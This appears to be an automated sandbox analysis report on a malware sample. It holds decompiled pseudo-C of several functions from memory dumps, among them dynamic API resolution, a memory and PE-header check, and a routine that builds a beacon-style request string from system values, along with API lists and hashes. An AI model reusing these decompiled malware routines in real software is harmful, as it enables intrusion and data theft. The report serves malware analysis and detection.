										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x00981264
0x0098126d
0x00981272
0x00981278
0x00981281
0x00981287
0x00981289
0x0098128c
0x00981291
0x00981298
0x00981298
0x0098129c
0x009812a2
0x009812a7
0x00000000
0x00000000
0x009812ad
0x009812b7
0x009812b9
0x009812bc
0x009812bf
0x009812c3
0x009812cb
0x009812cd
0x009812d0
0x00981338
0x00981338
0x0098133c
0x00000000
0x00000000
0x009812d5
0x009812db
0x009812dd
0x009812f0
0x009812f3
0x009812f3
0x009812f3
0x009812f7
0x009812df
0x009812df
0x009812e7
0x009812e9
0x00000000
0x00000000
0x00000000
0x00000000
0x009812e9
0x009812d7
0x009812d7
0x009812eb
0x009812eb
0x009812eb
0x009812fa
0x009812fd
0x009812ff
0x00981306
0x00981301
0x00981301
0x00981301
0x0098130e
0x00981314
0x00981316
0x00981346
0x00981318
0x00981318
0x0098131b
0x0098131d
0x00981325
0x00981325
0x0098132a
0x0098132c
0x00981333
0x00981335
0x00981335
0x00981335
0x00000000
0x00981335
0x00000000
0x00981316
0x009812c5
0x009812c5
0x009812c9
0x00000000
0x00000000
0x009812c9
0x00981349
0x00981349
0x00981350
0x00981355
0x00000000
0x00000000
0x0098135b
0x00981366
0x00000000
0x00981366
0x0098135d
0x0098135d
0x00981363
0x00000000
0x00981363
0x00981291
0x00981367
0x0098136c

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 0098129C
GetProcAddress.KERNEL32(?,00000000), ref: 0098130E

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 1a093b0573f31fde42b2cce913e8861737b3807e54ff4270d2dc4315ffdfcef7
Instruction ID: ea217ea27dbaa32b8280388681d1b2d4dfdde521f037ed25628448af2fe6915e
Opcode Fuzzy Hash: 1a093b0573f31fde42b2cce913e8861737b3807e54ff4270d2dc4315ffdfcef7
Instruction Fuzzy Hash: 38311971A0020ADBDB14DF59C890AAEB7FCFF14351F14446AD911E7310E774EA42DB54

Uniqueness

Uniqueness Score: -1.00%

Function 07F7B1E5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F7B1E5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x7f7d2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x7f7d328 = 1;
										__eflags =  *0x7f7d328;
										if( *0x7f7d328 != 0) {
											goto L60;
										}
										_t84 =  *0x7f7d2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x7f7d328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x7f7d2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x7f7d2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x7f7d2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x7f7d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x7f7d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x7f7d328 = 1;
							__eflags =  *0x7f7d328;
							if( *0x7f7d328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x7f7d2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x7f7d2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x7f7d328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x7f7d2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x7f7d2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x7f7d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x7f7d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x07f7b1ef
0x07f7b1f2
0x07f7b1f8
0x07f7b216
0x00000000
0x07f7b216
0x07f7b200
0x07f7b209
0x07f7b20f
0x07f7b21e
0x07f7b221
0x07f7b224
0x07f7b22e
0x07f7b22e
0x07f7b230
0x07f7b233
0x07f7b235
0x07f7b235
0x07f7b237
0x07f7b23a
0x00000000
0x00000000
0x07f7b23c
0x07f7b23e
0x07f7b2a4
0x07f7b2a4
0x07f7b402
0x00000000
0x07f7b402
0x07f7b240
0x07f7b240
0x07f7b244
0x07f7b246
0x07f7b246
0x07f7b246
0x07f7b246
0x07f7b249
0x07f7b24a
0x07f7b24d
0x07f7b24d
0x07f7b251
0x07f7b255
0x07f7b263
0x07f7b263
0x07f7b26b
0x07f7b271
0x07f7b273
0x07f7b275
0x07f7b285
0x07f7b292
0x07f7b296
0x07f7b29b
0x07f7b29d
0x07f7b31b
0x07f7b31b
0x07f7b29f
0x07f7b29f
0x07f7b29f
0x07f7b31d
0x07f7b31f
0x07f7b400
0x07f7b400
0x00000000
0x07f7b325
0x07f7b325
0x07f7b32c
0x00000000
0x00000000
0x07f7b332
0x07f7b336
0x07f7b392
0x07f7b394
0x07f7b39c
0x07f7b39e
0x07f7b3a0
0x00000000
0x00000000
0x07f7b3a2
0x07f7b3a8
0x07f7b3aa
0x07f7b3ac
0x07f7b3c1
0x07f7b3c1
0x07f7b3c3
0x07f7b3f2
0x07f7b3f9
0x00000000
0x07f7b3f9
0x07f7b3c7
0x07f7b3c8
0x07f7b3ca
0x07f7b3cc
0x07f7b3cc
0x07f7b3ce
0x07f7b3d0
0x07f7b3d2
0x07f7b3e6
0x07f7b3e6
0x07f7b3e9
0x07f7b3eb
0x07f7b3eb
0x07f7b3ec
0x07f7b3ec
0x00000000
0x07f7b3d4
0x07f7b3d4
0x07f7b3d4
0x07f7b3dd
0x07f7b3de
0x07f7b3e0
0x07f7b3e2
0x07f7b3e2
0x00000000
0x07f7b3d4
0x07f7b3d2
0x07f7b3ae
0x07f7b3b5
0x07f7b3b5
0x07f7b3b7
0x00000000
0x00000000
0x07f7b3b9
0x07f7b3ba
0x07f7b3bd
0x07f7b3bf
0x00000000
0x00000000
0x00000000
0x07f7b3bf
0x00000000
0x07f7b3b5
0x07f7b338
0x07f7b33b
0x07f7b340
0x00000000
0x00000000
0x07f7b349
0x07f7b34b
0x07f7b351
0x00000000
0x00000000
0x07f7b357
0x07f7b35d
0x00000000
0x00000000
0x07f7b363
0x07f7b365
0x07f7b36e
0x07f7b372
0x00000000
0x00000000
0x07f7b378
0x07f7b37b
0x07f7b37d
0x00000000
0x00000000
0x07f7b384
0x07f7b386
0x00000000
0x00000000
0x07f7b388
0x07f7b38c
0x00000000
0x00000000
0x00000000
0x07f7b38c
0x00000000
0x00000000
0x00000000
0x07f7b277
0x07f7b277
0x07f7b277
0x07f7b27e
0x00000000
0x00000000
0x07f7b280
0x07f7b281
0x07f7b283
0x00000000
0x00000000
0x00000000
0x07f7b283
0x07f7b2ab
0x07f7b2ad
0x00000000
0x00000000
0x07f7b2bd
0x07f7b2bf
0x07f7b2c1
0x00000000
0x00000000
0x07f7b2c7
0x07f7b2ce
0x07f7b2fa
0x07f7b2fa
0x07f7b2fc
0x07f7b2fe
0x07f7b312
0x07f7b314
0x00000000
0x00000000
0x00000000
0x00000000
0x07f7b300
0x07f7b300
0x07f7b300
0x07f7b309
0x07f7b30a
0x07f7b30c
0x07f7b30e
0x07f7b30e
0x00000000
0x07f7b300
0x07f7b2d0
0x07f7b2d0
0x07f7b2d3
0x07f7b2d5
0x07f7b2e7
0x07f7b2e7
0x07f7b2ea
0x07f7b2ec
0x07f7b2ec
0x07f7b2ed
0x07f7b2ed
0x07f7b2f3
0x07f7b2f3
0x00000000
0x00000000
0x00000000
0x00000000
0x07f7b2d7
0x07f7b2d7
0x07f7b2d7
0x07f7b2de
0x00000000
0x00000000
0x07f7b2e0
0x07f7b2e0
0x07f7b2e1
0x00000000
0x00000000
0x00000000
0x07f7b2e1
0x07f7b2e3
0x07f7b2e5
0x07f7b2f8
0x00000000
0x00000000
0x00000000
0x07f7b2f8
0x00000000
0x07f7b2e5
0x07f7b257
0x07f7b25a
0x07f7b25d
0x00000000
0x00000000
0x07f7b25f
0x07f7b261
0x00000000
0x00000000
0x00000000
0x07f7b261
0x07f7b226
0x07f7b228
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 07F7B296

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 54e828d1e74790526b341e295fbed92ed8a7988093980e01a0ec2208f0f21ed9
Instruction ID: a8c58a594c85db31103d1a0622144fc3388ea9197d6a4d08cb83e7fadf81dc16
Opcode Fuzzy Hash: 54e828d1e74790526b341e295fbed92ed8a7988093980e01a0ec2208f0f21ed9
Instruction Fuzzy Hash: AD61D4F1B0564B8FDB66CE29D89466D73A5EF87318F2C816BD852C7680E730D882C744

Uniqueness

Uniqueness Score: -1.00%

Function 6EB36EF7, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abdfd4259dac0264e1819dc0774c34bdc1615048e6f33fa519dfbd69ddd6ff34
Instruction ID: 046a6a095840ece35f004fb2f6f778f13932e6b3f0398bf9438e676a80400004
Opcode Fuzzy Hash: abdfd4259dac0264e1819dc0774c34bdc1615048e6f33fa519dfbd69ddd6ff34
Instruction Fuzzy Hash: 56F0A0726352709BCB12CBC8C502BC8B7BCEB09B11F210056E1419B244C3B0DD41CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 6EB36F7F, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04cf127003009d163f79a6ab5f54dee7f4c63f91a370702dfe546f1d45e784e5
Instruction ID: 560664b2048e1017f6642fb4de8ea6dc8ec6df845ea2c56b7a7896ca1cdcaf04
Opcode Fuzzy Hash: 04cf127003009d163f79a6ab5f54dee7f4c63f91a370702dfe546f1d45e784e5
Instruction Fuzzy Hash: 5EE08C72921278EBCB10CBD8C90198AF7FCEB44B00B21049AB511D3140C2B0DE01CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 07F75450, Relevance: 33.2, APIs: 22, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E07F75450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x7f7d018; // 0xd96449c3
				asm("bswap eax");
				_t61 =  *0x7f7d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 = E07F7D010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x7f7d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0x7f7d2a8; // 0xaaa5a8
				_t3 = _t64 + 0x7f7e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x7f7d02c,  *0x7f7d004, _t59);
				_t67 = E07F73288();
				_t68 =  *0x7f7d2a8; // 0xaaa5a8
				_t4 = _t68 + 0x7f7e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E07F7831C(_t134);
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x7f7d2a8; // 0xaaa5a8
					_t7 = _t126 + 0x7f7e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x7f7d238, 0, _v8);
				}
				_t73 = E07F79267();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x7f7d2a8; // 0xaaa5a8
					_t11 = _t121 + 0x7f7e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x7f7d238, 0, _v8);
				}
				_t146 =  *0x7f7d32c; // 0x8a295b0
				_t75 = E07F7284E(0x7f7d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x7f7d238, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x7f7d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x7f7d238, _t152, _v20);
						goto L26;
					}
					E07F73239(GetTickCount());
					_t82 =  *0x7f7d32c; // 0x8a295b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x7f7d32c; // 0x8a295b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x7f7d32c; // 0x8a295b0
					_t148 = E07F77B8D(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x7f7d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x7f7c28c);
					_push(_t148);
					_t94 = E07F7A677();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x7f7d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E07F77B3B( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E07F75433();
						L22:
						HeapFree( *0x7f7d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E07F79F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E07F7137B(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E07F78B22(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E07F77953(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E07F78B22(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x07f75450
0x07f75450
0x07f75450
0x07f75459
0x07f75462
0x07f75464
0x07f75464
0x07f75471
0x07f7547c
0x07f7547f
0x07f75484
0x07f7548d
0x07f75490
0x07f75495
0x07f75498
0x07f7549d
0x07f754a0
0x07f754ac
0x07f754b9
0x07f754bb
0x07f754c1
0x07f754c6
0x07f754d1
0x07f754d3
0x07f754d6
0x07f754d8
0x07f754dd
0x07f754e3
0x07f754e8
0x07f754eb
0x07f754f0
0x07f754fd
0x07f754ff
0x07f75505
0x07f7550f
0x07f7550f
0x07f75511
0x07f75516
0x07f7551b
0x07f7551e
0x07f75523
0x07f75530
0x07f75532
0x07f75540
0x07f75540
0x07f75542
0x07f75550
0x07f75555
0x07f75557
0x07f7555c
0x07f7571d
0x07f75727
0x07f75730
0x07f75562
0x07f7556e
0x07f75574
0x07f75579
0x07f75711
0x07f7571b
0x00000000
0x07f7571b
0x07f75585
0x07f7558a
0x07f75593
0x07f755a4
0x07f755a8
0x07f755b1
0x07f755b7
0x07f755c6
0x07f755cd
0x07f755d6
0x07f755dc
0x07f75705
0x07f7570f
0x00000000
0x07f7570f
0x07f755e8
0x07f755ee
0x07f755ef
0x07f755f4
0x07f755f9
0x07f756fb
0x07f75703
0x00000000
0x07f75703
0x07f75602
0x07f75609
0x07f75611
0x07f75616
0x07f7561f
0x07f7562a
0x07f7562f
0x07f75634
0x07f75733
0x07f756e7
0x07f756e7
0x07f756ec
0x07f756f7
0x07f756f9
0x00000000
0x07f756f9
0x07f7563e
0x07f75643
0x07f75648
0x07f7564d
0x07f7565d
0x07f75660
0x07f75666
0x07f7566c
0x07f75672
0x07f75675
0x07f7567b
0x07f7567e
0x07f75683
0x07f75687
0x07f75687
0x07f75693
0x07f7569f
0x07f756a3
0x07f756a5
0x07f756aa
0x07f756ac
0x07f756b1
0x07f756b6
0x07f756c3
0x07f756cb
0x07f756ce
0x07f756ce
0x07f756aa
0x00000000
0x07f75695
0x07f75699
0x07f756d0
0x07f756d3
0x07f756dc
0x00000000
0x00000000
0x00000000
0x00000000
0x07f756dc
0x07f7569b
0x00000000
0x07f7569b
0x07f75693

APIs

GetTickCount.KERNEL32 ref: 07F75464
wsprintfA.USER32 ref: 07F754B4
wsprintfA.USER32 ref: 07F754D1
wsprintfA.USER32 ref: 07F754FD
HeapFree.KERNEL32(00000000,?), ref: 07F7550F
wsprintfA.USER32 ref: 07F75530
HeapFree.KERNEL32(00000000,?), ref: 07F75540
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 07F7556E
GetTickCount.KERNEL32 ref: 07F7557F
RtlEnterCriticalSection.NTDLL(08A29570), ref: 07F75593
RtlLeaveCriticalSection.NTDLL(08A29570), ref: 07F755B1

Part of subcall function 07F77B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,07F79DA0,?,08A295B0), ref: 07F77BB8
Part of subcall function 07F77B8D: lstrlen.KERNEL32(?,?,?,07F79DA0,?,08A295B0), ref: 07F77BC0
Part of subcall function 07F77B8D: strcpy.NTDLL ref: 07F77BD7
Part of subcall function 07F77B8D: lstrcat.KERNEL32(00000000,?), ref: 07F77BE2
Part of subcall function 07F77B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,07F79DA0,?,08A295B0), ref: 07F77BFF

StrTrimA.SHLWAPI(00000000,07F7C28C,?,08A295B0), ref: 07F755E8

Part of subcall function 07F7A677: lstrlen.KERNEL32(08A29B78,00000000,00000000,74ECC740,07F79DCB,00000000), ref: 07F7A687
Part of subcall function 07F7A677: lstrlen.KERNEL32(?), ref: 07F7A68F
Part of subcall function 07F7A677: lstrcpy.KERNEL32(00000000,08A29B78), ref: 07F7A6A3
Part of subcall function 07F7A677: lstrcat.KERNEL32(00000000,?), ref: 07F7A6AE

lstrcpy.KERNEL32(00000000,?), ref: 07F75609
lstrcpy.KERNEL32(?,?), ref: 07F75611
lstrcat.KERNEL32(?,?), ref: 07F7561F
lstrcat.KERNEL32(?,00000000), ref: 07F75625

Part of subcall function 07F77B3B: lstrlen.KERNEL32(?,00000000,08A29D88,00000000,07F75142,08A29FAB,?,?,?,?,?,69B25F44,00000005,07F7D00C), ref: 07F77B42
Part of subcall function 07F77B3B: mbstowcs.NTDLL ref: 07F77B6B
